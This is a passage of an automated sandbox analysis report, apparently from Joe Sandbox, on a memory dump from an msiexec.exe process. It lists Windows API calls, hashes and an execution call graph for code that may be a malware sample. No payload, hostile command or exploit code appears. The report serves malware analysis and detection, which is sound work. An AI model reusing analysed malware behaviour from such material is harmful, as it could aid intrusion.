                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                      • Opcode ID: b4506daa50f9a2ccff106c3d1236ff8ddf92cde51705d150304461fe0cf3441a
                                                                                                                                                      • Instruction ID: c658f80049d79a3529b5117d6ab9be7d527115e33d20ebc807baae6e676887e2
                                                                                                                                                      • Opcode Fuzzy Hash: b4506daa50f9a2ccff106c3d1236ff8ddf92cde51705d150304461fe0cf3441a
                                                                                                                                                      • Instruction Fuzzy Hash: 8EF0C232942108FFEB419F95C808F9EBFBAEF05351F040168F929A2150DB378A41CB90
                                                                                                                                                      APIs
                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 21F5715C
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 21F5717F
                                                                                                                                                        • Part of subcall function 21F556D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21F55702
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 21F571A5
                                                                                                                                                      • _free.LIBCMT ref: 21F571B8
                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 21F571C7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 336800556-0
                                                                                                                                                      • Opcode ID: 55e6c077e50e29d66a40d9e09c160e42da2aee28db46fba5f24f5e46dcf4030a
                                                                                                                                                      • Instruction ID: c09aeaa85842d11b721484a762ca74b12d883b36a98b981af65beb5ac6b13c13
                                                                                                                                                      • Opcode Fuzzy Hash: 55e6c077e50e29d66a40d9e09c160e42da2aee28db46fba5f24f5e46dcf4030a
                                                                                                                                                      • Instruction Fuzzy Hash: B5018873606215BF37610ABA5C48D7B7E6FDAC3AA0350026DFD28C7204DA678C0285B0
                                                                                                                                                      APIs
                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000,21F5636D,21F55713,00000000,?,21F52249,?,?,21F51D66,00000000,?,?,00000000), ref: 21F55B7F
                                                                                                                                                      • _free.LIBCMT ref: 21F55BB4
                                                                                                                                                      • _free.LIBCMT ref: 21F55BDB
                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21F55BE8
                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21F55BF1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                      • Opcode ID: 69bdb72cae7e1e75a3f2c49ff911bf80a8b4c879334da7d5695ed1fabdb4ae2f
                                                                                                                                                      • Instruction ID: 1e0378271ff531ec2b71a9738c3b353028925fa5664042b458c053b8c8eaca86
                                                                                                                                                      • Opcode Fuzzy Hash: 69bdb72cae7e1e75a3f2c49ff911bf80a8b4c879334da7d5695ed1fabdb4ae2f
                                                                                                                                                      • Instruction Fuzzy Hash: C701F473145602FB928716381C88D0F3A6F9FC37B07290028F83992172EE2BC9064AA0
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,21F510DF,?,?,?,00000000), ref: 21F51E9A
                                                                                                                                                      • lstrcatW.KERNEL32(?,?,?,21F510DF,?,?,?,00000000), ref: 21F51EAC
                                                                                                                                                      • lstrlenW.KERNEL32(?,?,21F510DF,?,?,?,00000000), ref: 21F51EB3
                                                                                                                                                      • lstrlenW.KERNEL32(?,?,21F510DF,?,?,?,00000000), ref: 21F51EC8
                                                                                                                                                      • lstrcatW.KERNEL32(?,21F510DF,?,21F510DF,?,?,?,00000000), ref: 21F51ED3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$lstrcat
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 493641738-0
                                                                                                                                                      • Opcode ID: bf4c5f672fddbbeef9522cd0f8114fac4aa338b1283f2399fc5b4013636c291a
                                                                                                                                                      • Instruction ID: c979abce112fa927863f699a9ab0a65ac5e838965584fc9fd10cf5dcbc8d649b
                                                                                                                                                      • Opcode Fuzzy Hash: bf4c5f672fddbbeef9522cd0f8114fac4aa338b1283f2399fc5b4013636c291a
                                                                                                                                                      • Instruction Fuzzy Hash: 4FF0E227141214BBE321272AAC85EBF7F7CEFC6B60B40001DFA0C83184AB5A684293B5
                                                                                                                                                      APIs
                                                                                                                                                      • _free.LIBCMT ref: 21F591D0
                                                                                                                                                        • Part of subcall function 21F5571E: HeapFree.KERNEL32(00000000,00000000,?,21F5924F,?,00000000,?,00000000,?,21F59276,?,00000007,?,?,21F57E5A,?), ref: 21F55734
                                                                                                                                                        • Part of subcall function 21F5571E: GetLastError.KERNEL32(?,?,21F5924F,?,00000000,?,00000000,?,21F59276,?,00000007,?,?,21F57E5A,?,?), ref: 21F55746
                                                                                                                                                      • _free.LIBCMT ref: 21F591E2
                                                                                                                                                      • _free.LIBCMT ref: 21F591F4
                                                                                                                                                      • _free.LIBCMT ref: 21F59206
                                                                                                                                                      • _free.LIBCMT ref: 21F59218
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                      • Opcode ID: 05a347e3a682296ef7e074d0ea6228c990da79944c04ebf4d132ea0f61e60621
                                                                                                                                                      • Instruction ID: 79ee9c5fdec90d3f5b67cad99d9234f541e1c23767a8bb7edcafb4c3bea4e7b6
                                                                                                                                                      • Opcode Fuzzy Hash: 05a347e3a682296ef7e074d0ea6228c990da79944c04ebf4d132ea0f61e60621
                                                                                                                                                      • Instruction Fuzzy Hash: EEF049B1558294FB9A98DE58E6C4C0A7FEBFB21360760080DE939D7510CB3AF8818B60
                                                                                                                                                      APIs
                                                                                                                                                      • _free.LIBCMT ref: 21F5536F
                                                                                                                                                        • Part of subcall function 21F5571E: HeapFree.KERNEL32(00000000,00000000,?,21F5924F,?,00000000,?,00000000,?,21F59276,?,00000007,?,?,21F57E5A,?), ref: 21F55734
                                                                                                                                                        • Part of subcall function 21F5571E: GetLastError.KERNEL32(?,?,21F5924F,?,00000000,?,00000000,?,21F59276,?,00000007,?,?,21F57E5A,?,?), ref: 21F55746
                                                                                                                                                      • _free.LIBCMT ref: 21F55381
                                                                                                                                                      • _free.LIBCMT ref: 21F55394
                                                                                                                                                      • _free.LIBCMT ref: 21F553A5
                                                                                                                                                      • _free.LIBCMT ref: 21F553B6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                      • Opcode ID: ed5144dd96ace294963784f2f17a298c1468601c31c535d6cc0af98ae59c0f59
                                                                                                                                                      • Instruction ID: 9877fc30161d1bcb14c284eee582aae8321f752b7020b3b286cec7162abc2008
                                                                                                                                                      • Opcode Fuzzy Hash: ed5144dd96ace294963784f2f17a298c1468601c31c535d6cc0af98ae59c0f59
                                                                                                                                                      • Instruction Fuzzy Hash: 17F05470D95196FF8A8A5F24A58040A3FB3B715720701010AF83893275D77B19039B80
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\System32\msiexec.exe,00000104), ref: 21F54C1D
                                                                                                                                                      • _free.LIBCMT ref: 21F54CE8
                                                                                                                                                      • _free.LIBCMT ref: 21F54CF2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _free$FileModuleName
                                                                                                                                                      • String ID: C:\Windows\System32\msiexec.exe
                                                                                                                                                      • API String ID: 2506810119-1382325751
                                                                                                                                                      • Opcode ID: 742c5c16e95e3f9b42155147dd801880f7a4f01f4620223f72874266ac5ff119
                                                                                                                                                      • Instruction ID: 0f953f17a43e6e07d3cf7dd8668199e4e763a031c0b3e0ce7aa0a7ffe9ea289a
                                                                                                                                                      • Opcode Fuzzy Hash: 742c5c16e95e3f9b42155147dd801880f7a4f01f4620223f72874266ac5ff119
                                                                                                                                                      • Instruction Fuzzy Hash: 2D318071A40649FFDB55CF999884D9EBFFEEB85310F10405AE938A7210E6729A41CBA0
                                                                                                                                                      APIs
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,21F56FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 21F58731
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 21F587BA
                                                                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 21F587CC
                                                                                                                                                      • __freea.LIBCMT ref: 21F587D5
                                                                                                                                                        • Part of subcall function 21F556D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21F55702
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2652629310-0
                                                                                                                                                      • Opcode ID: 2aaa9baa7e5d036dbed39518752f3ac80cd36724e7b317efda63280f5cceceae
                                                                                                                                                      • Instruction ID: 919dc20c8da609e401a7e970dd80dca5b42ef0f7a1dce7bca5af4d33e2feffef
                                                                                                                                                      • Opcode Fuzzy Hash: 2aaa9baa7e5d036dbed39518752f3ac80cd36724e7b317efda63280f5cceceae
                                                                                                                                                      • Instruction Fuzzy Hash: F331AE72A0120AFFEF558F65DC84DAF7BA6EB41310F000268ED25DA150E736D965CB90
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleA.KERNEL32(21F5C7DD), ref: 21F5C7E6
                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,21F5C7DD), ref: 21F5C838
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 21F5C860
                                                                                                                                                        • Part of subcall function 21F5C803: GetProcAddress.KERNEL32(00000000,21F5C7F4), ref: 21F5C804
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1646373207-0
                                                                                                                                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                      • Instruction ID: cb9e6c592f7ef0a092bc3ffa4f39b69e247911269769600a87923f43ae3fbd9a
                                                                                                                                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                      • Instruction Fuzzy Hash: D301220194564EBCBA95C2740C00AAA6FDE9B33773B10175AE27386093C9A38506C3E6
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,21F51D66,00000000,00000000,?,21F55C88,21F51D66,00000000,00000000,00000000,?,21F55E85,00000006,FlsSetValue), ref: 21F55D13
                                                                                                                                                      • GetLastError.KERNEL32(?,21F55C88,21F51D66,00000000,00000000,00000000,?,21F55E85,00000006,FlsSetValue,21F5E190,FlsSetValue,00000000,00000364,?,21F55BC8), ref: 21F55D1F
                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,21F55C88,21F51D66,00000000,00000000,00000000,?,21F55E85,00000006,FlsSetValue,21F5E190,FlsSetValue,00000000), ref: 21F55D2D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                      • Opcode ID: e5841bbdcea92da7559ad2e553444480a96fec7be2bc7916a290d023f1640822
                                                                                                                                                      • Instruction ID: 7c4e1c1794215e103c884d10251c2ca51ceae0fd1e16548218f568ad23a5fc6f
                                                                                                                                                      • Opcode Fuzzy Hash: e5841bbdcea92da7559ad2e553444480a96fec7be2bc7916a290d023f1640822
                                                                                                                                                      • Instruction Fuzzy Hash: AF01F73764A622FBC3514A6C8C5CE467B5DAF066E17110624FA39D7150D737D802CBE0
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen
                                                                                                                                                      • String ID: : $Se.
                                                                                                                                                      • API String ID: 4218353326-4089948878
                                                                                                                                                      • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                      • Instruction ID: 6b7b328fbfd16afbede0a5a0aa05069a1e74f68caaf44033f92caf11d9529121
                                                                                                                                                      • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                      • Instruction Fuzzy Hash: EB1101B5904249BECB14CFAC9840BEEFBFDEF19304F10405AE555E7212E6706A028B61
                                                                                                                                                      APIs
                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 21F52903
                                                                                                                                                        • Part of subcall function 21F535D2: RaiseException.KERNEL32(?,?,?,21F52925,00000000,00000000,00000000,?,?,?,?,?,21F52925,?,21F621B8), ref: 21F53632
                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 21F52920
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                      • String ID: Unknown exception
                                                                                                                                                      • API String ID: 3476068407-410509341
                                                                                                                                                      • Opcode ID: 149ec2454dfffb458d9c7ddc213ca099e1abf56292c51d10f12bf0de480f27a4
                                                                                                                                                      • Instruction ID: 33528fbe141150831d163f71089ab05693273902e39b1d41aecd654f72a77cb6
                                                                                                                                                      • Opcode Fuzzy Hash: 149ec2454dfffb458d9c7ddc213ca099e1abf56292c51d10f12bf0de480f27a4
                                                                                                                                                      • Instruction Fuzzy Hash: 03F0A43990420EFB9B88ABA5EC8495D776F6B21790B904365EA34A6090FB33EA1585C0

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:5.6%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                      Signature Coverage:1.3%
                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                      Total number of Limit Nodes:74
                                                                                                                                                      execution_graph 37545 4466f4 37564 446904 37545->37564 37547 446700 GetModuleHandleA 37550 446710 __set_app_type __p__fmode __p__commode 37547->37550 37549 4467a4 37551 4467ac __setusermatherr 37549->37551 37552 4467b8 37549->37552 37550->37549 37551->37552 37565 4468f0 _controlfp 37552->37565 37554 4467bd _initterm __wgetmainargs _initterm 37555 44681e GetStartupInfoW 37554->37555 37556 446810 37554->37556 37558 446866 GetModuleHandleA 37555->37558 37566 41276d 37558->37566 37562 446896 exit 37563 44689d _cexit 37562->37563 37563->37556 37564->37547 37565->37554 37567 41277d 37566->37567 37609 4044a4 LoadLibraryW 37567->37609 37569 412785 37570 412789 37569->37570 37617 414b81 37569->37617 37570->37562 37570->37563 37573 4127c8 37623 412465 memset ??2@YAPAXI 37573->37623 37575 4127ea 37635 40ac21 37575->37635 37580 412813 37653 40dd07 memset 37580->37653 37581 412827 37658 40db69 memset 37581->37658 37584 412822 37680 4125b6 ??3@YAXPAX DeleteObject 37584->37680 37586 40ada2 _wcsicmp 37587 41283d 37586->37587 37587->37584 37590 412863 CoInitialize 37587->37590 37663 41268e 37587->37663 37589 412966 37681 40b1ab free free 37589->37681 37679 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37590->37679 37594 41296f 37682 40b633 37594->37682 37597 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37601 412957 CoUninitialize 37597->37601 37606 4128ca 37597->37606 37601->37584 37602 4128d0 TranslateAcceleratorW 37603 412941 GetMessageW 37602->37603 37602->37606 37603->37601 37603->37602 37604 412909 IsDialogMessageW 37604->37603 37604->37606 37605 4128fd IsDialogMessageW 37605->37603 37605->37604 37606->37602 37606->37604 37606->37605 37607 41292b TranslateMessage DispatchMessageW 37606->37607 37608 41291f IsDialogMessageW 37606->37608 37607->37603 37608->37603 37608->37607 37610 4044cf GetProcAddress 37609->37610 37613 4044f7 37609->37613 37611 4044e8 FreeLibrary 37610->37611 37614 4044df 37610->37614 37612 4044f3 37611->37612 37611->37613 37612->37613 37615 404507 MessageBoxW 37613->37615 37616 40451e 37613->37616 37614->37611 37615->37569 37616->37569 37618 414b8a 37617->37618 37619 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37617->37619 37686 40a804 memset 37618->37686 37619->37573 37622 414b9e GetProcAddress 37622->37619 37624 4124e0 37623->37624 37625 412505 ??2@YAPAXI 37624->37625 37626 41251c 37625->37626 37629 412521 37625->37629 37708 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37626->37708 37697 444722 37629->37697 37634 41259b wcscpy 37634->37575 37713 40b1ab free free 37635->37713 37637 40ac5c 37640 40ad4b 37637->37640 37641 40a9ce malloc memcpy free free 37637->37641 37643 40ace7 free 37637->37643 37648 40ad76 37637->37648 37717 40a8d0 7 API calls 37637->37717 37718 4099f4 37637->37718 37640->37648 37726 40a9ce 37640->37726 37641->37637 37643->37637 37714 40aa04 37648->37714 37649 40ada2 37650 40adc9 37649->37650 37651 40adaa 37649->37651 37650->37580 37650->37581 37651->37650 37652 40adb3 _wcsicmp 37651->37652 37652->37650 37652->37651 37732 40dce0 37653->37732 37655 40dd3a GetModuleHandleW 37737 40dba7 37655->37737 37659 40dce0 3 API calls 37658->37659 37660 40db99 37659->37660 37809 40dae1 37660->37809 37823 402f3a 37663->37823 37665 412766 37665->37584 37665->37590 37666 4126d3 _wcsicmp 37667 4126a8 37666->37667 37667->37665 37667->37666 37669 41270a 37667->37669 37857 4125f8 7 API calls 37667->37857 37669->37665 37826 411ac5 37669->37826 37679->37597 37680->37589 37681->37594 37683 40b640 37682->37683 37684 40b639 free 37682->37684 37685 40b1ab free free 37683->37685 37684->37683 37685->37570 37687 40a83b GetSystemDirectoryW 37686->37687 37688 40a84c wcscpy 37686->37688 37687->37688 37693 409719 wcslen 37688->37693 37691 40a881 LoadLibraryW 37692 40a886 37691->37692 37692->37619 37692->37622 37694 409724 37693->37694 37695 409739 wcscat LoadLibraryW 37693->37695 37694->37695 37696 40972c wcscat 37694->37696 37695->37691 37695->37692 37696->37695 37698 444732 37697->37698 37699 444728 DeleteObject 37697->37699 37709 409cc3 37698->37709 37699->37698 37701 412551 37702 4010f9 37701->37702 37703 401130 37702->37703 37704 401134 GetModuleHandleW LoadIconW 37703->37704 37705 401107 wcsncat 37703->37705 37706 40a7be 37704->37706 37705->37703 37707 40a7d2 37706->37707 37707->37634 37707->37707 37708->37629 37712 409bfd memset wcscpy 37709->37712 37711 409cdb CreateFontIndirectW 37711->37701 37712->37711 37713->37637 37715 40aa14 37714->37715 37716 40aa0a free 37714->37716 37715->37649 37716->37715 37717->37637 37719 409a41 37718->37719 37720 4099fb malloc 37718->37720 37719->37637 37722 409a37 37720->37722 37723 409a1c 37720->37723 37722->37637 37724 409a30 free 37723->37724 37725 409a20 memcpy 37723->37725 37724->37722 37725->37724 37727 40a9e7 37726->37727 37728 40a9dc free 37726->37728 37729 4099f4 3 API calls 37727->37729 37730 40a9f2 37728->37730 37729->37730 37731 40a8d0 7 API calls 37730->37731 37731->37648 37756 409bca GetModuleFileNameW 37732->37756 37734 40dce6 wcsrchr 37735 40dcf5 37734->37735 37736 40dcf9 wcscat 37734->37736 37735->37736 37736->37655 37757 44db70 37737->37757 37741 40dbfd 37760 4447d9 37741->37760 37744 40dc34 wcscpy wcscpy 37786 40d6f5 37744->37786 37745 40dc1f wcscpy 37745->37744 37748 40d6f5 3 API calls 37749 40dc73 37748->37749 37750 40d6f5 3 API calls 37749->37750 37751 40dc89 37750->37751 37752 40d6f5 3 API calls 37751->37752 37753 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37752->37753 37792 40da80 37753->37792 37756->37734 37758 40dbb4 memset memset 37757->37758 37759 409bca GetModuleFileNameW 37758->37759 37759->37741 37761 4447f4 37760->37761 37762 40dc1b 37761->37762 37763 444807 ??2@YAPAXI 37761->37763 37762->37744 37762->37745 37764 44481f 37763->37764 37765 444873 _snwprintf 37764->37765 37766 4448ab wcscpy 37764->37766 37799 44474a 8 API calls 37765->37799 37767 4448bb 37766->37767 37800 44474a 8 API calls 37767->37800 37770 4448a7 37770->37766 37770->37767 37771 4448cd 37801 44474a 8 API calls 37771->37801 37773 4448e2 37802 44474a 8 API calls 37773->37802 37775 4448f7 37803 44474a 8 API calls 37775->37803 37777 44490c 37804 44474a 8 API calls 37777->37804 37779 444921 37805 44474a 8 API calls 37779->37805 37781 444936 37806 44474a 8 API calls 37781->37806 37783 44494b 37807 44474a 8 API calls 37783->37807 37785 444960 ??3@YAXPAX 37785->37762 37787 44db70 37786->37787 37788 40d702 memset GetPrivateProfileStringW 37787->37788 37789 40d752 37788->37789 37790 40d75c WritePrivateProfileStringW 37788->37790 37789->37790 37791 40d758 37789->37791 37790->37791 37791->37748 37793 44db70 37792->37793 37794 40da8d memset 37793->37794 37795 40daac LoadStringW 37794->37795 37796 40dac6 37795->37796 37796->37795 37798 40dade 37796->37798 37808 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37796->37808 37798->37584 37799->37770 37800->37771 37801->37773 37802->37775 37803->37777 37804->37779 37805->37781 37806->37783 37807->37785 37808->37796 37819 409b98 GetFileAttributesW 37809->37819 37811 40daea 37812 40daef wcscpy wcscpy GetPrivateProfileIntW 37811->37812 37818 40db63 37811->37818 37820 40d65d GetPrivateProfileStringW 37812->37820 37814 40db3e 37821 40d65d GetPrivateProfileStringW 37814->37821 37816 40db4f 37822 40d65d GetPrivateProfileStringW 37816->37822 37818->37586 37819->37811 37820->37814 37821->37816 37822->37818 37858 40eaff 37823->37858 37827 411ae2 memset 37826->37827 37828 411b8f 37826->37828 37899 409bca GetModuleFileNameW 37827->37899 37840 411a8b 37828->37840 37830 411b0a wcsrchr 37831 411b22 wcscat 37830->37831 37832 411b1f 37830->37832 37900 414770 wcscpy wcscpy wcscpy CloseHandle 37831->37900 37832->37831 37834 411b67 37901 402afb 37834->37901 37838 411b7f 37957 40ea13 SendMessageW memset SendMessageW 37838->37957 37841 402afb 27 API calls 37840->37841 37842 411ac0 37841->37842 37843 4110dc 37842->37843 37844 41113e 37843->37844 37849 4110f0 37843->37849 37982 40969c LoadCursorW SetCursor 37844->37982 37846 411143 37983 444a54 37846->37983 37986 4032b4 37846->37986 37847 4110f7 _wcsicmp 37847->37849 37848 411157 37850 40ada2 _wcsicmp 37848->37850 37849->37844 